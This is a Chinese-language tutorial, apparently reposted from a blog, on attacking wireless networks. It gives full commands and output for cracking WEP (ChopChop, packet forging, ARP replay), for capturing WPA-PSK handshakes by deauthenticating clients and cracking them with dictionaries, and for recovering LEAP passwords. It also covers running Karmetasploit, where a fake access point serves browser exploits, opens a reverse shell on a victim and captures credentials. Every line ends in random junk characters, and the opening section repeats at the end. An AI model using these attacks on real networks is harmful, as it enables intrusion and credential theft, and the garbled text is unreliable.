[0x05e] - Korek ChopChop ***
/Eu|Jg=I
B[d%?L_
有一个家伙 KoreK 开发了一个棘手的***方法,称为 ChopChop。它要求只有一个加密的数据包用来解密获取的密钥流,然后使用密钥流生成 ARP 请求数据包,并最终执行 ARP 协议重播***。 rx@2Dmt6
我们使用 ChopChop ***,可以键入如下所示命令: ^OK;s wDW
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng 将挑选一个数据包进行解密。 8YQ7XB
*hh9 K
响应如下所示: csV3mzP
u5Mg
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 %q6I-
JW"n#sR4
#q5tG\gnM
Size: 90, FromDS: 1, ToDS: 0 (WEP) N$u: !
D'#,%4P,e\
BSSID = 00:1B:2F:3D:CB:D6 k7]4TIUD*
Dest. MAC = 00:1A:73:37:E2:A3 .R^ R|<x
Source MAC = 00:1B:2F:3D:CB:D6 "`h.8=-
V 7D<'!
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. -J0I2D
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N +W8kMuM!
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. +jO#?J
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K... @~FJlG(n
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. w=^~M[%w
0x0050: b09b f0f1 8b04 fc1c 0b72.............................. ...r y( UWh4?t
U&SSc@of
Use this packet ? =% |f-x
rl-#Ez
;u<F,o(
我们仍然键入“y”。 olm'_ {{
C~PP}|<~V
E!`/XB/nA
Use this packet ? y =6N=5JePB
,+x\NY2d
Equ%6x
然后系统进行解密。 O#<S\66
iZ0(a
Saving chosen packet in replay_src-0223-211242.cap xXJzE|)1h!
?.ofs}
.ts XQf
Offset 87 ( 3% done) | xor = 4E | pt = 3C | Ds@K%f(.?w
Offset 86 ( 5% done) | xor = 16 | pt = 1D | P<9T.l
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 7w\!3pv
Offset 84 ( 8% done) | xor = 97 | pt = 6B | "V,dH%&j
Offset 83 (10% done) | xor = 0E | pt = 0A | QwuSo{G
Offset 82 (12% done) | xor = 86 | pt = 0D | &m{~4]qWpM
tq*{Hil>P`
$G Vf;M2*
64 frames written in 1097ms }( WUZ^L
119 frames written in 2029ms lg@q} ]1
146 frames written in 2476ms u@zT~\ h*
239 frames written in 4068ms Ae<;b Of
228 frames written in 3865ms qLB(Th\&'
273 frames written in 4646ms NNRKYdp,
+ Cq&~<B
" j:15m5
x/ P\qI
lPz5.(5'
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms h5))D!
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms RP wP4Z
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms <"S/M]9
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms @Tsdgx8
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms r\|" j8
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms L/O:V^1
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms ;giT[KK
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms \0l"9 B.
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms }iR!uhi#
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms uTP4r
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms j<i: rk|
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms f/=H#'+8
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms $EuI2.o
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms .fS1
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms eadY(-4|I-
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms ((Wq
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms o=do L{ #
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms e +O0l
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms 'I)E.DoF
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms lD)QB!*v
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms jhSc9
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms _{'HY+M
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms ]]bL;vlw
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms Y<-dd"\
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms K)t+lJ
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms HzF]hm,
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms &`[Dl(W
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms p)=Fi}#D\
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms ^ $t7p 1
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms O WVa&8O
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms U GJ# "9
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms mam2]St"
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms 9:tKRN_D
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms 2@S{e$YK`
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms f ^f{tOX
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms P:y M j&)
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms Yxt`Uvc(^h
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms \f_YJit
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms RHGs (d7-
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms uiIY,FL$
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms Td5;bg6Qy
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms QviH+9
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms ;Qc_Tf=,
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms ?B2 T'}~
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms iS^IqS
FU|c[u|z
The AP appears to drop packets shorter than 37 bytes. n^;:V8k
Enabling standard workaround: IP header re-creation. el*C8TWlw
Cu0N/hBT
ozbu|9 +v
UNJ]$x0
eM*@zo<-
This doesn't look like an IP packet, try another one. [e+"G <>
XTD _q
Warning: ICV checksum verification FAILED! Trying workaround. 42?X)n>
The AP appears to drop packets shorter than 40 bytes. SR#X\AWM
Enabling standard workaround: IP header re-creation. [{ak&{R,9{
n_%JXm#\
Saving plaintext in replay_dec-0223-211410.cap xr) Rx{)3h
Saving keystream in replay_dec-0223-211410.xor z./M^7v?
xQa[bvW
Completed in 21s (2.48 bytes/s) !Jw
#~54t0|Cd>
这一过程由 xor 文件和 cap 文件产生。xor 文件包含密钥流;cap 文件包含解密数据包。 &_ Ewu@4
M=$y_9#
MPMJkL$F^
'}*5ee](S
z]> 0A
[0x05f] - 数据包伪造 FS r `Y
W{l+_a{/9
Re('7m h~
创建加密的数据包形式 PRGA(XOR)从 ChopChop 或碎片得到。 FfN==2:b
!'Xk=+
mCe,(/>l+
#Packetforge-ng -0 - a xx:xx:xx:xx:xx:xx - h yy:yy:yy:yy:yy:yy - k X~Uvh8O
255.255.255.255 -y replay_dec-0223-211410.xor -w arp |Sy |E
g.X?wyg5
其结果是: m1=3@>
`h( JD$w
Wrote packet to: arp |cJyP9}n
cu]2`DF
8HdmG{7.
从这个命令中,我们得到 ARP 请求数据包中的文件名为“arp”。 )M LOYX
C',D"
9zEO$<e o
]x?9lQ1&
zF.rsNY
[0x05g] - 交互式 ARP 重播*** g AC}
/K:M ,q
z)=D&\HX
我们使用 aireplay 注入 ARP 请求数据包到接入点。通过输入下面的命令。 wt[MzpRP
Byyus[b'A
#aireplay-ng -2 -r arp rausb0 b-U LoV
n`? j. s
响应将如下所示所示: cfMj^*I
NQ !t`
Size: 68, FromDS: 0, ToDS: 1 (WEP) 5Y#yz>B@ ]
R8F[ 7&(
BSSID = 00:1B:2F:3D:CB:D6 s\1h=V)!H
Dest. MAC = FF:FF:FF:FF:FF:FF ~;QO`I=0P
Source MAC = 00:21:27:C0:07:71 "'p:M,:
\$T
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q f ySzZ
vXLiYWo
;RB]awE
255.255.255.255 - l j1*'yvGM
8 ]]uk=P
LoSblV
Mg W0 ).
{3@f(H m
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334........... ..U....N.4 /@X!
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; A&jkc'
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ S3EY9:^ C
0x0040: 66bf 700e f.p. %/"I.\%d
D)U 9xA)J
Use this packet ? x :\+{-
G|Rsj{2'
m~'!
我们回应“y”。 8om6wALXB
&l"/G%W
Use this packet ? y E;/WP!/.
"XlNKBgM
aireplay-ng 开始注入数据包。 Q^prHn*@
C]414Ibi
x? tC2L
Saving chosen packet in replay_src-0223-211755.cap U$v|c%6
You should also start airodump-ng to capture replies. p4GhT~)l:
7rQwn2XD{
Sent 1200 packets...(499 pps) k>E^FB=
i)y8MlC{
,`PC^`0c}o
p[R4!if2
mSLA4[4{
?+av9;Kg
[0x05h] - 破解 WEP 密钥 7irpD7P>
在我们收集足够的加密包之后,我们使用 aircrack-ng 来恢复密钥。 zU7co.G
#aircrack-ng -z capture1.cap (PTW Attack) Em)U`"j/9
!q\MXS($#u
成功地破解结果如下所示: F t/yPv
QO2@K1Y
Opening capture1.cap _U.|$pU
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. ! Gob `# r
KEY FOUND! [ 00:11:22:33:44 ] &O +?#3
Decrypted correctly: 100% YI+ clh;%9
0JFS%Yjw[
^h\(j*/#X
Q g~cYwX
Ri>4:V3K
'0-YFx'U0V
[0x06] - 破解 WEP 的总结脚本 "@z X{^:
Az7 ] qb
6am g*=]
Note: $AP 是接入点的 MAC 地址 W4;/;[/L
$WIFI 是 WIFI 网卡的 MAC 地址 IOA2/ WQu
- airmon-ng start wlan0 11 (监控模式必须确定具体频道)- airodump-ng -c 11 -w capture1.cap wlan0 uMx6:
za%gD
rJZR8bo
cY5w,.Q/!
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 - aireplay-ng -4 -b $AP -h $WIFI wlan0 7}:+Yx
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 !4-4i
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request Vwu dNjL
- aireplay-ng -2 -r arp-request wlan0 wz'=
- aircrack-ng -z capture1.cap F r!FV4
vgE -t
** 这些方法可用于客户端的 WEP 破解。 fat;5XL@
@R-11wP)M
U9ZuD40\
2X<%BFsE
-woFKAy`
[0x07] - 拥有 WPA-PSK/WPA2-PSK 密钥 o$eo\X?J?
d~AL4~}
=z;]FauR!
PSK 代表 Pre-Shared 密钥。这些机制的改善从而解决了 WEP 的脆弱性。 CT5s`v!s
因此,它能够使用相同的破解 WEP 方式来破解密钥。只有这样,才能恢复 WPA-PSK 或 WPA2-PSK,也就是说获取4 次握手并利用字典***的破解。 G^N@ r:RS
这个主意破解 Pre-shared 密钥是收集四次握手包。我们能够做到这一点,去验证相关的客户端。这种方式将迫使客户端进行重新验证,我们可以在这个进程中进行四次握手。验证命令如下所示:#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 U?an\rv
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 ; PncJe5x
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] YA@MLZm
我猜想我们获取了这一进程 workshop.cap 文件。所以,我们使用 aircrack 进行破解。#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap .%y'q!?
成功的结果如下所示: Cdy,8*
T60pw
Opening test-02.cap <}:` Y"
Read 252 packets. Q^ZM|(s#
>{QO$F#
# BSSID ESSID Encryption #bBh. ^
4d%0a%Z
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) O^3kPVr
E_En"r)y
Choosing first network as target. F$(ak;v}
5L:-Xr{
Opening workshop-02.cap oz>2P.7
Reading packets, please wait... t))MZw&@
PWyf3
(T0MWp0
5LB{b]w7m
?!&%-R6*
Aircrack-ng 1.0 rc1 r1085 | bz%SB
6IG?t
8'zZVX D<
[00:00:00] 0 keys tested (0.00 k/s) Ac|\~w[\
hK{H7Ey*
7n6g;8xE
KEY FOUND! [ TheFuckinWPAKey ] IO)#O<
{?eU AB<
>4jE[$p]"
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 X)[tb]U/Wx
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 /@k#tdj
Si>38vCJ*
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 qU7_%Z
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 }I&.xzJ
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 ~2"hh$
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 Q2 VF+g ,
]a4U\yr
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D (c(F1=K
Bzrnmz5S
zHb [.ry~
从这个结果中可以看出,它意味着 WPA-PSK/WPA2-PSK 密钥是“TheFuckinWPAKey”。 =Z
W5 F\e[Ax5
p H y
T U0-L35P1
;>v.(0FE6
[0x08] - 无线网企业漏洞利用 (WPA-TLS/TTLS/PEAP) Dcvul4Q
E$)|Kv^
大多数公司转向使用公共密钥加密的无线网络,他们认为这是绝对安全的。但是,狡猾的***者***这一系统仍然是由欺骗证书。 A)&FcMO*z
这种***方法是一种利用客户端信息。许多客户端接受认证而不考虑它是否是真正的证书或没有证书。这使***者冒充自己是 RADIUS 服务器和 Loggin 凭证资料的受害者。 ={O ~
我们可以使用 Freeradius 伪装 Radius 服务器与 WPE 补丁结合,使 Loggin 凭证资料到 Freeradius 服务器。附加说明: http://www.willhackforsushi.com/FreeRADIUS_WPE.html ( 2 HM "Pd
ETdXk&AN
<?nIO
/I`TN5~
[0x09] - CISCO LEAP 漏洞利用 <kK>C8+
JN0h3nZ_
Cisco 专有轻量级扩展身份验证协议(LEAP)无线认证过程有助于消除安全漏洞,基于用户的认证,并能够产生动态的 WEP 密钥。Cisco LEAP 是一个所指定的 802.1X 可扩展身份验证协议(EAP)类型。 1Z# $X`
o&?c,FwN
LEAP 是易于执行和控制的特性,如: z'q~%1t
- 相互身份验证 H#TkIFo]
- 基于用户验证 rwF$aR>9
- 动态 WEP 密钥 SyvoN, ;Q
本文转载自:神秘小强' blog QQ交流群:29097418 M~:_^B
p;+O/'/j
我们发现用户名是以明文发送到 Radius,但捕获的 Wireshark 密码是加密的,因此,同样容易进行漏洞利用。asleap 是一个工具,用来恢复脆弱的 LEAP 和 PPTP 密码,asleap 可以执行: +0pI}a\
NIV}hf YF
- 脆弱的 LEAP 和 PPTP 密码恢复 <Vhd4c
- Deauthentication 客户端的 WLAN(加快 LEAP 密码恢复)AIRJACK 驱动程序 {*yvvb
Q|(}rIWOQA
下载 Asleap http://asleap.sourceforge.net/ ; I>nA6A
OyTK,i<n
第一步,使用 asleap 建立必需的资料库(.dat)和索引文件(.idx) [6!k:-t+
nrl?<4 _
#./genkeys -r dict -f dict.dat -n dict.idx P7drUiX
,!:c6F+
dict = Our wordlist/dictionary file, with one word per line X7*F~LFr j
dict.dat = Our new output pass+hash file (generated as a result of running this command) P6gkbtg
dict.idx = Our new output index filename (generated as a result of running this command) bY~K)j v3&
6Og@tho
#./genkeys -r dictionary -f dict.dat -n dict.idx 'Ea3(OsuXn
PL:(Se%
genkeys 1.4 - generates lookup file for asleap. < mailto:jwright@hasborg.com > Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second uKJ:)oyaCP
Starting sort (be patient) ...Done. - nb U5o
Completed sort in 0 compares. mY 1l2
Creating index file (almost finished) ...Done. iJTG +gx
,HjJ jpE
yhH2b:nY(9
最后一个步骤是恢复薄弱的 LEAP 密码,运行 asleap 命令创建新的.dat 和.idx 文件: D2ggFxqe
;j0.#P:a
#./asleap -r data/leap.dump -f dict.dat -n dict.idx +Y?Tri
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used) 2"6L\8hd2
dict.dat = Our output pass+hash file (generated with genkeys, see above) +Nn >*sz
dict.idx = Our new output index filename (generated with genkeys, see above) wX] _Abk
Q 8]X
#./asleap -r data/leap.dump -f dict.dat -n dict.idx LW=qX%o {
%<yW(s9{
\KV.lG!
asleap 1.4 - actively recover LEAP/PPTP passwords. < mailto:jwright@hasborg.com > Using the passive attack method. 7] y3<t
Captured LEAP exchange information: ir^d7CV,
username: qa_leap KE\>T:
challenge: 0786aea0215bc30a X0*+]tRg
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 sD3Ts;k
hash bytes: 4a39 >D=X Tgqqq
9No6\{[M
(0`rfYv5.R
^ iu)vED
`_ ^I 2
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 z{R Mb
password: qaleap !UzE&CirV
Closing pcap ... 6~ET@"0uK
[]OS p&
OBFM70K
注意:成功率取决于字典大小 KMT$/I{p,
,,FhE
现在 ASLEAP 2.2,包含“-C”和“-R”选项来指定十六进制分割字节的挑战与对策。使用此选项,Asleap 成为一个通用的 MS-CHAPv2 破解工具。 hj= n;,a9
.WglLUJ:Z
qPu?rU{2
HmXxM:[4;
1xxTI{'g[
*4 m]UK
[0x10] - Karmetasploit 大规模利用 :4:U\k;QwA
gC6Gm':c
c7rC!v
HD Moore 发布了一些说明信息( http://trac.metasploit.com/wiki/Karmetasploit)获得 karmetasploit 工作的框架。 i [/1AI
BAqwYWdS
Karmetasploit 可以发送伪装 AP 并与客户端连接。***者可以记录 Cookie、Ftp、Http、认证信息等等。还可以在客户端机器利用浏览器漏洞。 |r*y63\T
1\jj3Y'i'
这种方法测试在 Backtrack3(最终) E]Cm#B
http://www.smxiaoqiang.cn/ &Ai +t2
1. 更新 Aircrack-NG P@etT8|V
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng $ make &S^a_L:
# make install "t{D5{q|[k
2. 让我们测试一下 aireplay-ng 的工作(注入数据包必须支持你的无线网卡) Dhft[mvo
bt# aireplay-ng -9 wlan0 [c>YKN2qa
15:10:21 Trying broadcast probe requests... 15:10:21 Injection is working! eET1f8 B=L
15:10:25 Found 5 APs `C:J{`
G!GGT?J
15:10:25 Trying directed probe requests... YZ0Q?7l7
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC' 15:10:35 0/30: 0% Jl) Q #
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP' 15:10:42 0/30: 0% $+ \JT/eG9
ECOzquvM
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM' F-?s8RD
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27 15:10:48 5/30: 60% p-8x>dmP(
15:10:48 Injection is working! )J|~'{z:
5,V3_p:)VI
b;e*`f8T3c
nrZZkQNI
~p/1 9/
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi' 15:56:53 0/30: 0% [tz}H&
?F%,d{^
现在它在进行注入工作! 7N fA)$
&qFy$`"
3. 更新 Metasploit +,Z Q( ZW
h-:te9p6>4
$ svn co http://metasploit.com/svn/framework3/trunk msf3 LZ*ZXFIg
GZqy.AE,
4. 下载 Bash 脚本 http://www.darkoperator.com/kmsapng.tgz 2~*.X^dR
.q (1
该脚本执行以下操作: PzD ekyl
- 改变 MAC 地址的接口 iyf vcKO
- 设置监听模式的接口 ;JQ;LbEn
- 启动 Airbase-ng 的 Karma AP uz;z+Bd^
- 更改 MTU 接口大小 %Y//}
- 设置 IP 地址 N1i%b,:3
- 启动 DHCPD 服务器 - }9a%
- 设置 iptables 重定向 aqzIMOAf
- 启动 Metasploit aoVfvz2Y
'l*p!=
6. 然后我们运行 kmsapng.sh,像这样: bs=x>F
Wc q UF"A
#./kmsapng.sh -i wlan0 -m km -s linksys e${Cf
:N ~A7@
Changing MAC Address Ga1(T$ |H
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation) 9( "<NB0y
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.) %RS8zN
starting fake ap zLda&#+
This will take 15 seconds ... .>Fy ]Cqoh
DHCPD started successfully yTb#V"eR
Starting Packet capture to /root/kms.cap p,K]`pt=
Starting Metasploit +<o}@hefY2
3"HW{=
_ ]d]rV `RF
| | o o1zKns?
_ _ _ _ _|_ __, , _ | | __ _|_ $]t3pAI[H0
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| | /\0g)B ;]
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ 82*nC!P3E
/| _aj,tz
\| 9 m`VIB
3yw`%$d5
=[ msf v3.2-release {GP#/5$=
+ -- --=[ 304 exploits - 124 payloads r(6$. zx
+ -- --=[ 18 encoders - 6 nops x@*!MC #
=[ 79 aux ^Ez`WP
T1[B*RwC
resource> load db_sqlite3 .:/[%q{k
,?/AIL]_
PyQ P K,
cfhiZ~."T
[*] Successfully loaded plugin: db_sqlite3 e` {F7rd:
resource> db_create /root/karma.db uP NZ^lM
[*] The specified database already exists, connecting [*] Successfully connected to the database &X&msEM
[*] File: /root/karma.db i8|0z I
resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 172.16.1.207 .hVB)@ /
AUTOPWN_HOST => 172.16.1.207 w g U2q|
resource> setg AUTOPWN_PORT 55550 E@[ZwTnJ
AUTOPWN_PORT => 55550 PSREQK@}E
resource> setg AUTOPWN_URI /ads nv'YtmR
AUTOPWN_URI => /ads EAZLo;
resource> set LHOST 172.16.1.207 O0RV>Ml'&
LHOST => 172.16.1.207 n =qu?xu
resource> set LPORT 45000 BBDt^$
LPORT => 45000 R?5v //[
resource> set SRVPORT 55550 pK NrEq
SRVPORT => 55550 P TMJ.;
resource> set URIPATH /ads D/&nEMp6
URIPATH => /ads 7 V3r!y
resource> run +[Bl@RHe^
[*] Starting exploit modules on host 172.16.1.207... 2#)z%K6T
[*] Started reverse handler 6Ij'z9nJw
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto I4(z'C
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto a?1Ml>R6P
[*] Server started. 1+v!)Y>Z&
[*] Started reverse handler U#g ,XJ
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava }s@vN8C
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava ;!pSYcT,
[*] Server started. O#n=mJ
[*] Started reverse handler VI k]`)#
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface K;l xPM]
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface bsv!z\}
[*] Server started. w=kW~gg
[*] Started reverse handler w,1&s}; g\
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp ~nRbb;M
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp ,b9!\OWDF
[*] Server started. (w1$m8`=
[*] Started reverse handler &~V6g(9
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings FJ] ?45
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings mGh8/Xt
[*] Server started. Kb~i9x&
[*] Started reverse handler M a^}7D /
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype [7Liken
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype @+yjt'B
[*] Server started. _18Aek
[*] Started reverse handler A`nzqe#(1
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject .TO#\!KBv
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject >!PCEw<i
OZ4%6/
?*:BgaR_
F7\nG}#s
."j=s#OC(
[*] Server started. 9#1Jie$
[*] Started reverse handler AA5UOg\jI
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe [*] Server started. #Yx /ubg6
[*] Started reverse handler ^zKP5nzL
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core [*] Server started. ^&\<[ \
[*] Started reverse handler Q|7;Zsd:
[*] Server started. ntn ~=oL
[*] Using URL: http://0.0.0.0:55550/ads Dv}VmC""
[*] Local IP: http://127.0.0.1:55550/ads >S@><[C
[*] Server started. &/$ 3>MD2`
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 110 WD|pG;Gq
SRVPORT => 110 3+8{Y
resource> set SSL false L RPdA "Z
SSL => false nQ;M@k&9eV
resource> run 1 }_"2
[*] Server started. S+u@ Q}
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 995 ^t P|8k
SRVPORT => 995 ^]9.$$GU\A
resource> set SSL true i}~U/.P
SSL => true v K!vA-7
resource> run e\ ! ic
[*] Server started. ?-=<7 ~$
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/ftp 89ab?H}/
resource> run I]Vkaf I>(
[*] Server started. /e7BW0$1
&'c&B0j
43Ua@KNi
v|:TYpku3
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493... [*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507) N2&h yM
ZQ[s/
msf auxiliary(http) > sessions -i 2 {$'oKJy*
[*] Starting interaction with 2... #{zF~/Qq
VTn6@z_ x
Microsoft Windows XP [版本 5.1.2600] ]Mj N)%hT
(C) 版权所有 1985-2001 Microsoft Corp. _s+_M+@et
z*`nfTw l
D:\Mozilla Firefox> cd .. A3Y}|7QA
CFG(4IMx
I1W~;2cK
43N=O FU
>H,PST
D:\> net user Cd7l+~*Y
o.])5i_HV
\\CZY 的用户帐户 #w;%{C[D
La\|Bwx
/ a$B8,
__vmware_user__ Administrator ASPNET O:+?:aI@
Guest HelpAssistant IUSR_CWH E*8).'S%k
IWAM_CZY CZY SUPPORT_388945a0 Pi=B\=gs
命令成功完成。 2UEjn>2
6<9gVh<=w
=7 -@&S=?s
?xtP\~
]SNcL [U
[0x11] - 旅程的尾声 iTJE:[W"y
SaA-Krn
操作都是处于 Linux 环境下完成的,无论如何,我希望它对你有所帮助。 +P;&/z8i*g
-PskUl'
本文是针对交流技术和合法的***测试目的而写,作者不负责使用此文件内容所带来的损害。如果你想对其他人的系统使用这方面的技术,则必须要求对方同意或合法的***测试。
B[d%?L_
有一个家伙 KoreK 开发了一个棘手的***方法,称为 ChopChop。它要求只有一个加密的数据包用来解密获取的密钥流,然后使用密钥流生成 ARP 请求数据包,并最终执行 ARP 协议重播***。 rx@2Dmt6
我们使用 ChopChop ***,可以键入如下所示命令: ^OK;s wDW
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng 将挑选一个数据包进行解密。 8YQ7XB
*hh9 K
响应如下所示: csV3mzP
u5Mg
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 %q6I-
JW"n#sR4
#q5tG\gnM
Size: 90, FromDS: 1, ToDS: 0 (WEP) N$u: !
D'#,%4P,e\
BSSID = 00:1B:2F:3D:CB:D6 k7]4TIUD*
Dest. MAC = 00:1A:73:37:E2:A3 .R^ R|<x
Source MAC = 00:1B:2F:3D:CB:D6 "`h.8=-
V 7D<'!
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. -J0I2D
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N +W8kMuM!
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. +jO#?J
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K... @~FJlG(n
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. w=^~M[%w
0x0050: b09b f0f1 8b04 fc1c 0b72.............................. ...r y( UWh4?t
